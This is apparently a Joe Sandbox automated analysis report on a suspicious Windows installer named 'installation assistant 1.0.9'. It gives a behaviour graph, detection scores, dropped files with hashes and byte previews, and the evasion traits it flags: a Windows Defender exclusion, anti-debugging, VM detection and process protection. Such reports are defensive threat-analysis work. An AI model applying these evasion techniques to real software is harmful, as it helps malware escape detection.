behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579605 Sample: #U5b89#U88c5#U52a9#U624b_1.... Startdate: 23/12/2024 Architecture: WINDOWS Score: 80 99 Found driver which could be used to inject code into processes 2->99 101 PE file contains section with special chars 2->101 103 AI detected suspicious sample 2->103 105 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->105 11 #U5b89#U88c5#U52a9#U624b_1.0.9.exe 2 2->11         started        14 cmd.exe 2->14         started        16 cmd.exe 2->16         started        18 30 other processes 2->18 process3 file4 97 C:\...\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, PE32 11->97 dropped 20 #U5b89#U88c5#U52a9#U624b_1.0.9.tmp 3 5 11->20         started        24 sc.exe 1 14->24         started        26 sc.exe 1 16->26         started        28 sc.exe 1 18->28         started        30 sc.exe 1 18->30         started        32 sc.exe 1 18->32         started        34 26 other processes 18->34 process5 file6 83 C:\Users\user\AppData\Local\...\update.vac, PE32 20->83 dropped 85 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 20->85 dropped 107 Adds a directory exclusion to Windows Defender 20->107 36 #U5b89#U88c5#U52a9#U624b_1.0.9.exe 2 20->36         started        39 powershell.exe 23 20->39         started        42 conhost.exe 24->42         started        44 conhost.exe 26->44         started        46 conhost.exe 28->46         started        48 conhost.exe 30->48         started        50 conhost.exe 32->50         started        52 conhost.exe 34->52         started        54 25 other processes 34->54 signatures7 process8 file9 87 C:\...\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, PE32 36->87 dropped 56 #U5b89#U88c5#U52a9#U624b_1.0.9.tmp 4 16 36->56         started        109 Loading BitLocker PowerShell Module 39->109 60 conhost.exe 39->60         started        62 WmiPrvSE.exe 39->62         started        signatures10 process11 file12 89 C:\Users\user\AppData\Local\...\update.vac, PE32 56->89 dropped 91 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 56->91 dropped 93 C:\Program Files (x86)\...\trash (copy), PE32+ 56->93 dropped 95 3 other files (none is malicious) 56->95 dropped 111 Query firmware table information (likely to detect VMs) 56->111 113 Protects its processes via BreakOnTermination flag 56->113 115 Hides threads from debuggers 56->115 117 Contains functionality to hide a thread from the debugger 56->117 64 cmd.exe 56->64         started        66 7zr.exe 2 56->66         started        69 7zr.exe 6 56->69         started        signatures13 process14 file15 71 sc.exe 64->71         started        73 Conhost.exe 64->73         started        81 C:\Program Files (x86)\...\tProtect.dll, PE32+ 66->81 dropped 75 conhost.exe 66->75         started        77 conhost.exe 69->77         started        process16 process17 79 conhost.exe 71->79         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b_1.0.9.exe0%ReversingLabs
#U5b89#U88c5#U52a9#U624b_1.0.9.exe6%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\is-B21TE.tmp0%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-19N0I.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-IRLCV.tmp\_isetup\_setup64.tmp0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://aria2.github.io/Usage:#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drfalse
    unknown
    https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b_1.0.9.exefalse
      high
      https://github.com/aria2/aria2/issuesReport#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drfalse
        high
        http://www.metalinker.org/#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drfalse
          high
          https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1701537778.000000007F57B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1700871640.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000000.1703739788.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.1796069280.000000000032D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drfalse
            high
            https://aria2.github.io/#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drfalse
              unknown
              https://github.com/aria2/aria2/issues#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drfalse
                high
                https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1701537778.000000007F57B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1700871640.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000000.1703739788.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.1796069280.000000000032D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drfalse
                  high
                  http://www.metalinker.org/basic_string::_M_construct#U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drfalse
                    high
                    No contacted IP infos
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1579605
                    Start date and time:2024-12-23 05:16:31 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 10m 15s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Run name:Run with higher sleep bypass
                    Number of analysed new started processes analysed:110
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Critical Process Termination
                    Sample name:#U5b89#U88c5#U52a9#U624b_1.0.9.exe
                    renamed because original name is a hash value
                    Original Sample Name:_1.0.9.exe
                    Detection:MAL
                    Classification:mal80.evad.winEXE@146/32@0/0
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 76%
                    • Number of executed functions: 66
                    • Number of non-executed functions: 77
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                    • Exclude process from analysis (whitelisted): SIHClient.exe
                    • Excluded IPs from analysis (whitelisted): 52.149.20.212
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    No simulations
                    No context
                    No context
                    No context
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                      #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b_1.0.1.exeGet hashmaliciousUnknownBrowse
                          #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                            #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                              #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                                ekTL8jTI4D.msiGet hashmaliciousUnknownBrowse
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):831200
                                  Entropy (8bit):6.671005303304742
                                  Encrypted:false
                                  SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                  MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                  SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                  SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                  SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.1.exe, Detection: malicious, Browse
                                  • Filename: #U5b89#U88c5#U52a9#U624b_1.0.8.exe, Detection: malicious, Browse
                                  • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious, Browse
                                  • Filename: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, Detection: malicious, Browse
                                  • Filename: ekTL8jTI4D.msi, Detection: malicious, Browse
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):249984
                                  Entropy (8bit):7.999161200123711
                                  Encrypted:true
                                  SSDEEP:6144:y/aC0aIi4VmN4i3LvqKPN23ksnaWL8Q9rye+Bm14B:yNb5fDNV23Ulm14B
                                  MD5:6B02F0DA3BB2B4FE892A9A462B66FF7C
                                  SHA1:5C9453562989CC675FBC88545BE306EF5CB09EF2
                                  SHA-256:58590B431FB3F05C915B9827DEFD9DD1E488F159D9712EC48C37A8A10BCDDF77
                                  SHA-512:3FFA99A1C554D14499934C40A9EC8F0646957E8C9F3D90B67E5581CEB7064B673C5654A84CE2193DA8BB5DECEE979F1152221B520A4E6E4FA9688A542A969ECC
                                  Malicious:false
                                  Preview:.@S........,...............}..T....N.W....D..,nk.m..a%.kc..k!87.SM]..5.?.."\.z"..+l:...v.....R.E..r...j:......`...Z:...s...W.b...N....(..XF....>.Z.....PhGWp^b!....0..R.y.t..).z,q....43.UH......b\.@F.S......F....OO`.....J:...J#..fT&eA..1...P.^.......{............o.k..O......q.D(.g..].o...j..a.y.<.f@.l.6..c........F........v....v.....s..3.1..Jw.m.|..I(BSm..z...5u....@y.$T)..lW`a1kP/.0.....b...X.kS..t1..r....G...G..;..Q.z...P....T.'*...u.&.x@.8..IKK.}......}T...t5.$..'..&.-?u}..j.~}JAq".!c.....x~.v.e.C...\.B... ..............;[.H...q.n.y.yf"p.@.`.......WyY...u...+.....'..B..h.........E-."r.v.5.$p..*.R..=.s...Mj.....jy.JQ.......c.=.l..0.\[k..#Ph)..&........Nd;H...)o.Q.8..A:...Q..^......M.. .:7........X.>.4.raf.j.L..{...............ZI8..5..........P|.O..+dZ.Z....Z._.t..!.j5..N.G$.F33vc."D...?[..);X.......vYCp..N.;."}..hn.wk?..y.../1P,..5v..KX....Z. ...g..+......p..v4.&..~..a...K.."..S. ..*.........Rr3}.X....d|G....t..+P.&W/n..u.uA..........GP$..d
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):3598848
                                  Entropy (8bit):7.004949099807939
                                  Encrypted:false
                                  SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                  MD5:1D1464C73252978A58AC925ECE57F0FB
                                  SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                  SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                  SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                  Malicious:false
                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):249984
                                  Entropy (8bit):7.999161200123711
                                  Encrypted:true
                                  SSDEEP:6144:y/aC0aIi4VmN4i3LvqKPN23ksnaWL8Q9rye+Bm14B:yNb5fDNV23Ulm14B
                                  MD5:6B02F0DA3BB2B4FE892A9A462B66FF7C
                                  SHA1:5C9453562989CC675FBC88545BE306EF5CB09EF2
                                  SHA-256:58590B431FB3F05C915B9827DEFD9DD1E488F159D9712EC48C37A8A10BCDDF77
                                  SHA-512:3FFA99A1C554D14499934C40A9EC8F0646957E8C9F3D90B67E5581CEB7064B673C5654A84CE2193DA8BB5DECEE979F1152221B520A4E6E4FA9688A542A969ECC
                                  Malicious:false
                                  Preview:.@S........,...............}..T....N.W....D..,nk.m..a%.kc..k!87.SM]..5.?.."\.z"..+l:...v.....R.E..r...j:......`...Z:...s...W.b...N....(..XF....>.Z.....PhGWp^b!....0..R.y.t..).z,q....43.UH......b\.@F.S......F....OO`.....J:...J#..fT&eA..1...P.^.......{............o.k..O......q.D(.g..].o...j..a.y.<.f@.l.6..c........F........v....v.....s..3.1..Jw.m.|..I(BSm..z...5u....@y.$T)..lW`a1kP/.0.....b...X.kS..t1..r....G...G..;..Q.z...P....T.'*...u.&.x@.8..IKK.}......}T...t5.$..'..&.-?u}..j.~}JAq".!c.....x~.v.e.C...\.B... ..............;[.H...q.n.y.yf"p.@.`.......WyY...u...+.....'..B..h.........E-."r.v.5.$p..*.R..=.s...Mj.....jy.JQ.......c.=.l..0.\[k..#Ph)..&........Nd;H...)o.Q.8..A:...Q..^......M.. .:7........X.>.4.raf.j.L..{...............ZI8..5..........P|.O..+dZ.Z....Z._.t..!.j5..N.G$.F33vc."D...?[..);X.......vYCp..N.;."}..hn.wk?..y.../1P,..5v..KX....Z. ...g..+......p..v4.&..~..a...K.."..S. ..*.........Rr3}.X....d|G....t..+P.&W/n..u.uA..........GP$..d
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):5649408
                                  Entropy (8bit):6.392614480390128
                                  Encrypted:false
                                  SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                  MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                  SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                  SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                  SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                  Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):56546
                                  Entropy (8bit):7.997011252064675
                                  Encrypted:true
                                  SSDEEP:1536:MsEZo4RLSOELwdAAOTXo+Pqyq5P5J74UmnNap/FOtP08J:8y4RLddAAOTXoKqZZQn1
                                  MD5:DB0ACE7AA74DAA24BB781119C3C869AE
                                  SHA1:07A3730409AFB5070EC735425E77B492B6EBA129
                                  SHA-256:3FF34DB386F861828A302E5A4AD3E57409CAA8D4CCF5C867F80C2C8B514AF30D
                                  SHA-512:8FDBB6D6D195AB1EE949DBD855D4E6B1E58EEFF7191D667E9A8737C27A2ED0326AF905496CC61156FE48B2443FA1846DE668C5630F200E3408981B3AB439395C
                                  Malicious:false
                                  Preview:.@S.....Q..l ...............L......h..|y}.......O..Fo.u.+..+.j.ca..v.@.....&....c[/.f..E.....o*Ck.\......J...v.o.N..J.._._\Y.1.-..f/....K.....}"..i.|h.[..y1.1w...k.t..L.....V..<.X.........P..(...~q.$..Z...r$....}......-.D.....&.?K..u3.7.....0.....vi6{{.....S..}...*..%./....B[...uc..o....h9?.Pl.....}.q'.....N.-..:.....-(...8.........=B.pah.n...1.Mdp~7@......%r.N3I...R.P.}=j.^......,.p.9.........L.e6....A.+.k]`f..;O.9/hU@........x...%&.C.YR.....n..IA..ZG*>......%.Y92..4z.....H....].9..K*..\O.o..^S.....P..B...!h...z.S..h.....7UkS."Exy}..q._c.,.19...>C..W.<RQ.v......U..h.....XpG.%.X.......}........_`....."L....G'g.. .*K...0..z.P..1..\......7..3....y...2........X...W...8......E.@Y[....Z.."..0..u.wC.M.+....`...%._m.F..}iC...C.{..4..:9......I..@C.y..s%.6.C.....=...f.a^...e...A..y..?.....n....W....k.J.{.......i(.{iZ.......Z`\....H....J..WT...+.....I..[O.._....k[..h..........A...1'..p.4.co...e...2.R..KIP.j.._.B...]!.as. ...1..8..@....q.7.h.$F.
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:7-zip archive data, version 0.4
                                  Category:dropped
                                  Size (bytes):56546
                                  Entropy (8bit):7.99701125206467
                                  Encrypted:true
                                  SSDEEP:1536:DzeJcAKCT4h5YjqiOU+HyhjI3GKG0pY0e7zjuX+u:Dz4DtTfd/yvY0e7uJ
                                  MD5:09A8667EA9E45CA2FDD69DB8D762B163
                                  SHA1:0FADBFC5D02C59B7DB8C9CA9EB437FA7A6AE80FA
                                  SHA-256:DACDD802F11565D9F8321D7884C8E865E6868EF1647794BFF17B063AB9234992
                                  SHA-512:21A78AE277171BE6E3E6155F2753DA1E58C96AFD068BEE36884C91DF2BE831E225BC1652CCF56400311E6266749CEA1328B9BF4811C7A736BBE237C3E5D5DBDE
                                  Malicious:false
                                  Preview:7z..'...z..........2.......y.[....5..4....]2;G}l0.B.....r.E..V.O...(.8.r..^Q.....V...u..<...n.....7V.0..tw8~.m..~.f....\P.......K..(...13S.v.W:O...`y.4.....H....'.....1....s$[.I0Y...2q.cU.b.w._..gw...+p..j..T..>.f.M@^...-e,....~..}W.....^..H3.,L1:........)@kT.t..}>.[..N..Y(Pu...c.7..i_7/...0..sr.BO....ibJtN....T.H......RYn..X..Ifa\Z.f ..e...`...........WSq.t......p.[./.Z......y.;_<......`..j)..M...CT@i.{.~.....2.......q.HBL{....I...q.u....&.-..4..5......(.p........!...20<'....&...A..@....`:.......~z._.....N.2.%^.k.h];x..........O_....A..u..lf...+.a.....}!.gT].6,.<a..6n....pt.S.v.}n<Wj.{u~..0.4....../.M....._J...fL:u.V..&.:'.[..t..;'#K..z.[I6.of.b.....QK=.....@...PM.o...Vf..."*Ssh.3M'.K1._..&..}.q...~~..._.C.f..G.$&...m.m.Q.$..$...<.V6.Jg..*.......>...n"..'a.....O... .V..jR.."h..a...PD..aH...Dl2.Y..._W"3'.R..f...Y/...[..L....*....>9...1B..:n~,.M.T[%.G2....t.7nt..)".X]..<.nD.....@..IO.d. ..g ...-um.*."-...s.d!.Q...^...u.?.4.\l.#'{..H_......?.x
                                  Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):56546
                                  Entropy (8bit):7.996966859255975
                                  Encrypted:true
                                  SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                                  MD5:CEA69F993E1CE0FB945A98BF37A66546
                                  SHA1:7114365265F041DA904574D1F5876544506F89BA
                                  SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                                  SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                                  Malicious:false
                                  Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:7-zip archive data, version 0.4
                                  Category:dropped
                                  Size (bytes):56546
                                  Entropy (8bit):7.996966859255979
                                  Encrypted:true
                                  SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                                  MD5:4CB8B7E557C80FC7B014133AB834A042
                                  SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                                  SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                                  SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                                  Malicious:false
                                  Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                                  Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):31890
                                  Entropy (8bit):7.99402458740637
                                  Encrypted:true
                                  SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                                  MD5:8622FC7228777F64A47BD6C61478ADD9
                                  SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                                  SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                                  SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                                  Malicious:false
                                  Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                                  Process:C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                                  File Type:7-zip archive data, version 0.4
                                  Category:dropped
                                  Size (bytes):31890
                                  Entropy (8bit):7.99402458740637
                                  Encrypted:true
                                  SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                                  MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                                  SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                                  SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                                  SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
